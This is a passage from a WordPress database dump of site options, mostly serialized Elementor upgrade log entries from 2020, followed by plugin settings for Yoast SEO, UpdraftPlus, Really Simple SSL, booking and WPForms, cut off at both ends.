\";s:4:\"type\";s:4:\"info\";}}s:32:\"f9ff1c0a0478f35ddae5d27fefb6c519\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-05-01 00:19:12\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:60:\"Elementor/Upgrades - _v_2_7_1_remove_old_usage_data Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-05-01 00:19:12\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:60:\"Elementor/Upgrades - _v_2_7_1_remove_old_usage_data Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"08157b8a27db890d5f398d995a2b53a7\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-05-01 00:19:12\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:54:\"Elementor/Upgrades - _v_2_7_1_recalc_usage_data Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-05-01 00:19:12\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:54:\"Elementor/Upgrades - _v_2_7_1_recalc_usage_data Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"016227ef76573afc0ee99cb85fe37f02\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-05-01 00:19:15\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:56:\"Elementor/Upgrades - _v_2_7_1_recalc_usage_data Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-05-01 00:19:15\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:56:\"Elementor/Upgrades - _v_2_7_1_recalc_usage_data Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"0afb3858f42660690d1f993e06d700dc\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-05-01 00:19:15\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.6.8\";s:2:\"to\";s:5:\"2.9.8\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-05-01 00:19:15\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.6.8\";s:2:\"to\";s:5:\"2.9.8\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"07af038b6bcdd87e271fd9693d682cd8\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-06-01 19:04:56\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.9.8\";s:2:\"to\";s:6:\"2.9.10\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-06-01 19:04:56\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"2.9.8\";s:2:\"to\";s:6:\"2.9.10\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"38a096c97ecc40581c35c968eb117b68\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-06-20 11:04:45\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"2.9.10\";s:2:\"to\";s:6:\"2.9.12\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-06-20 11:04:45\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"2.9.10\";s:2:\"to\";s:6:\"2.9.12\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"8b01b6e57ae0437709814ab87a08d84e\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-07-01 20:03:22\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"2.9.12\";s:2:\"to\";s:6:\"2.9.13\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-07-01 20:03:22\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"2.9.12\";s:2:\"to\";s:6:\"2.9.13\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"bee6830794413d297e8304ef8dddff4f\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-08-05 20:21:08\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"2.9.13\";s:2:\"to\";s:6:\"2.9.14\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-08-05 20:21:08\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"2.9.13\";s:2:\"to\";s:6:\"2.9.14\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"ca6af264b62219ca06ac12bdc7f3b6d4\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-08-30 15:37:04\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"2.9.14\";s:2:\"to\";s:5:\"3.0.4\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-08-30 15:37:04\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"2.9.14\";s:2:\"to\";s:5:\"3.0.4\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"1434f4cfcca9a86f7b883d0ad84ac3cc\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-08-30 15:37:04\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-08-30 15:37:04\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"9ffcd2a77a9343b87de94f06c739293b\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-08-30 15:37:04\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:65:\"Elementor/Upgrades - _v_3_0_0_move_general_settings_to_kit Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-08-30 15:37:04\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:65:\"Elementor/Upgrades - _v_3_0_0_move_general_settings_to_kit Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"e36ccfb435559f1ea4db8fc0db08438d\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-08-30 15:37:04\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:67:\"Elementor/Upgrades - _v_3_0_0_move_general_settings_to_kit Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-08-30 15:37:04\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:67:\"Elementor/Upgrades - _v_3_0_0_move_general_settings_to_kit Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"850614fca56e48a2a3d0c8216c737044\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-08-30 15:37:04\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:63:\"Elementor/Upgrades - _v_3_0_0_move_default_colors_to_kit Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-08-30 15:37:04\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:63:\"Elementor/Upgrades - _v_3_0_0_move_default_colors_to_kit Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"2233b091d68b5ec329d5ea17edf82dc9\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-08-30 15:37:04\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:65:\"Elementor/Upgrades - _v_3_0_0_move_default_colors_to_kit Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-08-30 15:37:04\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:65:\"Elementor/Upgrades - _v_3_0_0_move_default_colors_to_kit Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"b7c9dd5d7d615c8fe94f6abb57ae5c03\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-08-30 15:37:04\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:61:\"Elementor/Upgrades - _v_3_0_0_move_saved_colors_to_kit Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-08-30 15:37:04\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:61:\"Elementor/Upgrades - _v_3_0_0_move_saved_colors_to_kit Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"645bf445d7da2c4ebb8cdc7feebc1fdf\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-08-30 15:37:04\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:63:\"Elementor/Upgrades - _v_3_0_0_move_saved_colors_to_kit Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-08-30 15:37:04\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:63:\"Elementor/Upgrades - _v_3_0_0_move_saved_colors_to_kit Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"b5d6235f9e687820c05e5f238341b975\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-08-30 15:37:04\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:67:\"Elementor/Upgrades - _v_3_0_0_move_default_typography_to_kit Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-08-30 15:37:04\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:67:\"Elementor/Upgrades - _v_3_0_0_move_default_typography_to_kit Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"6c4e413d3072de2b494fda9b6da386f2\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-08-30 15:37:04\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:69:\"Elementor/Upgrades - _v_3_0_0_move_default_typography_to_kit Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-08-30 15:37:04\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:69:\"Elementor/Upgrades - _v_3_0_0_move_default_typography_to_kit Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"f0dab62cd1e10b8850ef02bf96e766ca\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-08-30 15:37:04\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"2.9.14\";s:2:\"to\";s:5:\"3.0.4\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-08-30 15:37:04\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"2.9.14\";s:2:\"to\";s:5:\"3.0.4\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"7cdfd2d9601783faedee1f63be1d4844\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-09-02 20:33:57\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.0.4\";s:2:\"to\";s:5:\"3.0.5\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-09-02 20:33:57\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.0.4\";s:2:\"to\";s:5:\"3.0.5\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"88dd37381ae6370c19436b698db66bc9\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-09-02 20:33:57\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-09-02 20:33:57\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"069583ccdd5793f99ca6336f3e46506b\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-09-02 20:33:57\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:73:\"Elementor/Upgrades - _v_3_0_5_re_move_space_between_widgets_to_kit Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-09-02 20:33:57\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:73:\"Elementor/Upgrades - _v_3_0_5_re_move_space_between_widgets_to_kit Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"4c426c0333bad188c136bf106a965a64\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-09-02 20:33:57\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:75:\"Elementor/Upgrades - _v_3_0_5_re_move_space_between_widgets_to_kit Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-09-02 20:33:57\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:75:\"Elementor/Upgrades - _v_3_0_5_re_move_space_between_widgets_to_kit Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"05961cca1c0a35fa76edd1871e2d9a1e\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-09-02 20:33:57\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.0.4\";s:2:\"to\";s:5:\"3.0.5\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-09-02 20:33:57\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.0.4\";s:2:\"to\";s:5:\"3.0.5\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"f7203c3e303e5dbf284e82f921907fe6\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-10-10 08:56:04\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.0.5\";s:2:\"to\";s:6:\"3.0.11\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-10-10 08:56:04\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:5:\"3.0.5\";s:2:\"to\";s:6:\"3.0.11\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"5671ef5867bc4e693612b9b86eebf8d6\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2020-10-30 13:18:32\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.0.11\";s:2:\"to\";s:6:\"3.0.12\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2020-10-30 13:18:32\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.0.11\";s:2:\"to\";s:6:\"3.0.12\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}}','no'),(52537,'updraftplus_dismisseddashnotice','1585699358','yes'),(52538,'elementor_tracker_notice','1','yes'),(52539,'ms_hide_spring2019_ads_until','7601472180','yes'),(52547,'updraftplus_version','1.16.33','yes'),(52563,'updraftplus_tour_cancelled_on','backup_options','yes'),(52742,'wpseo_upgrade_history','a:1:{i:1554218576;a:3:{s:7:\"options\";a:3:{s:5:\"wpseo\";a:20:{s:15:\"ms_defaults_set\";b:0;s:7:\"version\";s:3:\"9.4\";s:20:\"disableadvanced_meta\";b:1;s:19:\"onpage_indexability\";b:1;s:11:\"baiduverify\";s:0:\"\";s:12:\"googleverify\";s:0:\"\";s:8:\"msverify\";s:0:\"\";s:12:\"yandexverify\";s:0:\"\";s:9:\"site_type\";s:0:\"\";s:20:\"has_multiple_authors\";b:0;s:16:\"environment_type\";s:0:\"\";s:23:\"content_analysis_active\";b:1;s:23:\"keyword_analysis_active\";b:1;s:21:\"enable_admin_bar_menu\";b:1;s:26:\"enable_cornerstone_content\";b:1;s:18:\"enable_xml_sitemap\";b:1;s:24:\"enable_text_link_counter\";b:1;s:22:\"show_onboarding_notice\";b:1;s:18:\"first_activated_on\";i:1484703049;s:18:\"recalibration_beta\";b:0;}s:12:\"wpseo_social\";a:17:{s:13:\"facebook_site\";s:0:\"\";s:13:\"instagram_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:11:\"myspace_url\";s:0:\"\";s:16:\"og_default_image\";s:0:\"\";s:18:\"og_frontpage_title\";s:0:\"\";s:17:\"og_frontpage_desc\";s:0:\"\";s:18:\"og_frontpage_image\";s:0:\"\";s:9:\"opengraph\";b:1;s:13:\"pinterest_url\";s:0:\"\";s:15:\"pinterestverify\";s:0:\"\";s:14:\"plus-publisher\";s:0:\"\";s:7:\"twitter\";b:1;s:12:\"twitter_site\";s:0:\"\";s:17:\"twitter_card_type\";s:7:\"summary\";s:11:\"youtube_url\";s:0:\"\";s:15:\"google_plus_url\";s:0:\"\";}s:12:\"wpseo_titles\";a:64:{s:10:\"title_test\";i:0;s:17:\"forcerewritetitle\";b:0;s:9:\"separator\";s:7:\"sc-dash\";s:16:\"title-home-wpseo\";s:42:\"%%sitename%% %%page%% %%sep%% %%sitedesc%%\";s:18:\"title-author-wpseo\";s:41:\"%%name%%, Author at %%sitename%% %%page%%\";s:19:\"title-archive-wpseo\";s:38:\"%%date%% %%page%% %%sep%% %%sitename%%\";s:18:\"title-search-wpseo\";s:63:\"You searched for %%searchphrase%% %%page%% %%sep%% %%sitename%%\";s:15:\"title-404-wpseo\";s:35:\"Page not found %%sep%% %%sitename%%\";s:19:\"metadesc-home-wpseo\";s:0:\"\";s:21:\"metadesc-author-wpseo\";s:0:\"\";s:22:\"metadesc-archive-wpseo\";s:0:\"\";s:9:\"rssbefore\";s:0:\"\";s:8:\"rssafter\";s:53:\"The post %%POSTLINK%% appeared first on %%BLOGLINK%%.\";s:20:\"noindex-author-wpseo\";b:0;s:28:\"noindex-author-noposts-wpseo\";b:1;s:21:\"noindex-archive-wpseo\";b:1;s:14:\"disable-author\";b:0;s:12:\"disable-date\";b:0;s:19:\"disable-post_format\";b:0;s:18:\"disable-attachment\";b:1;s:20:\"breadcrumbs-404crumb\";s:25:\"Error 404: Page not found\";s:29:\"breadcrumbs-display-blog-page\";b:1;s:20:\"breadcrumbs-boldlast\";b:0;s:25:\"breadcrumbs-archiveprefix\";s:12:\"Archives for\";s:18:\"breadcrumbs-enable\";b:0;s:16:\"breadcrumbs-home\";s:4:\"Home\";s:18:\"breadcrumbs-prefix\";s:0:\"\";s:24:\"breadcrumbs-searchprefix\";s:16:\"You searched for\";s:15:\"breadcrumbs-sep\";s:7:\"&raquo;\";s:12:\"website_name\";s:0:\"\";s:11:\"person_name\";s:0:\"\";s:22:\"alternate_website_name\";s:0:\"\";s:12:\"company_logo\";s:0:\"\";s:12:\"company_name\";s:0:\"\";s:17:\"company_or_person\";s:0:\"\";s:17:\"stripcategorybase\";b:0;s:10:\"title-post\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-post\";s:0:\"\";s:12:\"noindex-post\";b:0;s:13:\"showdate-post\";b:0;s:23:\"display-metabox-pt-post\";b:1;s:10:\"title-page\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-page\";s:0:\"\";s:12:\"noindex-page\";b:0;s:13:\"showdate-page\";b:0;s:23:\"display-metabox-pt-page\";b:1;s:16:\"title-attachment\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:19:\"metadesc-attachment\";s:0:\"\";s:18:\"noindex-attachment\";b:0;s:19:\"showdate-attachment\";b:0;s:29:\"display-metabox-pt-attachment\";b:1;s:18:\"title-tax-category\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-category\";s:0:\"\";s:28:\"display-metabox-tax-category\";b:1;s:20:\"noindex-tax-category\";b:0;s:18:\"title-tax-post_tag\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-post_tag\";s:0:\"\";s:28:\"display-metabox-tax-post_tag\";b:1;s:20:\"noindex-tax-post_tag\";b:0;s:21:\"title-tax-post_format\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:24:\"metadesc-tax-post_format\";s:0:\"\";s:31:\"display-metabox-tax-post_format\";b:1;s:23:\"noindex-tax-post_format\";b:1;s:23:\"post_types-post-maintax\";i:0;}}s:11:\"old_version\";s:3:\"9.4\";s:11:\"new_version\";s:6:\"10.1.1\";}}','no'),(53605,'duplicate_page_options','a:4:{s:21:\"duplicate_post_status\";s:5:\"draft\";s:23:\"duplicate_post_redirect\";s:7:\"to_list\";s:21:\"duplicate_post_suffix\";s:0:\"\";s:21:\"duplicate_post_editor\";s:7:\"classic\";}','yes'),(54558,'_amn_wpforms-lite_to_check','1577398484','yes'),(55852,'updraft_auto_updates','0','yes'),(55887,'_transient_timeout_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca','1557657381','no'),(55905,'wp_page_for_privacy_policy','0','yes'),(55906,'show_comments_cookies_opt_in','1','yes'),(56076,'wordfence_ls_version','1.0.5','yes'),(56286,'booking_ics_force_import','Off','yes'),(56287,'booking_ics_force_trash_before_import','Off','yes'),(57141,'elementor_icon_manager_needs_update','yes','yes'),(57142,'elementor_load_fa4_shim','yes','yes'),(57849,'booking_timeline_load','timeline_v2_flex','yes'),(58044,'ms_hide_thankyou_ads_until','1599331619','yes'),(58140,'_elementor_editor_upgrade_notice_dismissed','1588625056','yes'),(58521,'rlrsssl_options','a:16:{s:12:\"site_has_ssl\";b:1;s:4:\"hsts\";b:0;s:22:\"htaccess_warning_shown\";b:0;s:19:\"review_notice_shown\";b:1;s:25:\"ssl_success_message_shown\";b:1;s:26:\"autoreplace_insecure_links\";b:1;s:17:\"plugin_db_version\";s:5:\"3.3.5\";s:5:\"debug\";b:0;s:20:\"do_not_edit_htaccess\";b:0;s:17:\"htaccess_redirect\";b:1;s:11:\"ssl_enabled\";b:1;s:19:\"javascript_redirect\";b:0;s:11:\"wp_redirect\";b:1;s:31:\"switch_mixed_content_fixer_hook\";b:0;s:19:\"dismiss_all_notices\";b:0;s:21:\"dismiss_review_notice\";b:0;}','yes'),(58531,'rsssl_activation_timestamp','1571502285','yes'),(58840,'admin_email_lifespan','0','yes'),(59449,'fs_gdpr','a:1:{s:2:\"u1\";a:1:{s:8:\"required\";b:0;}}','yes'),(59649,'booking_is_use_localized_time_format','Off','yes'),(59665,'elementor_active_kit','940','yes'),(59816,'_transient_timeout_wpseo_link_table_inaccessible','1615521203','no'),(59817,'_transient_wpseo_link_table_inaccessible','0','no'),(59818,'_transient_timeout_wpseo_meta_table_inaccessible','1615521203','no'),(59819,'_transient_wpseo_meta_table_inaccessible','0','no'),(59894,'wpforms_version_lite','1.5.9.1','yes'),(59895,'action_scheduler_hybrid_store_demarkation','941','yes'),(59896,'schema-ActionScheduler_StoreSchema','3.0.1584580771','yes'),(59897,'schema-ActionScheduler_LoggerSchema','2.0.1584580771','yes'),(59900,'action_scheduler_lock_async-request-runner','1605274743','yes'),(59901,'action_scheduler_migration_status','complete','yes'),(60276,'wpforms_notifications','a:4:{s:6:\"update\";i:1604081846;s:4:\"feed\";a:2:{i:0;a:6:{s:5:\"title\";s:77:\"New in WPForms! A Divi Module, Email Address Restrictions + Date/Time Limits.\";s:7:\"content\";s:339:\"Controlling forms has never been easier. WPForms now lets you easily add forms right inside the Divi page builder, so you can ditch the shortcodes. Not only that, but you can now block or allow specific email addresses, and there’s a new datepicker field in town that lets you set date and time limits. Plus, an easy-to-find Help Menu.\r\n\";s:4:\"type\";a:1:{i:0;s:4:\"lite\";}s:2:\"id\";i:37;s:4:\"btns\";a:2:{s:4:\"main\";a:2:{s:3:\"url\";s:225:\"https://wpforms.com/introducing-wpforms-1-6-3-divi-module-email-address-restrictions-date-time-limits-more/?utm_source=WordPress&utm_campaign=liteplugin&utm_medium=Plugin Notification&utm_content=WPForms 1.6.3 Lite Learn More\";s:4:\"text\";s:10:\"Learn More\";}s:3:\"alt\";a:2:{s:3:\"url\";s:164:\"https://wpforms.com/wpforms-lite-upgrade/?utm_source=WordPress&utm_campaign=liteplugin&utm_medium=Plugin Notification&utm_content=WPForms 1.6.3 Lite Get WPForms Pro\";s:4:\"text\";s:15:\"Get WPForms 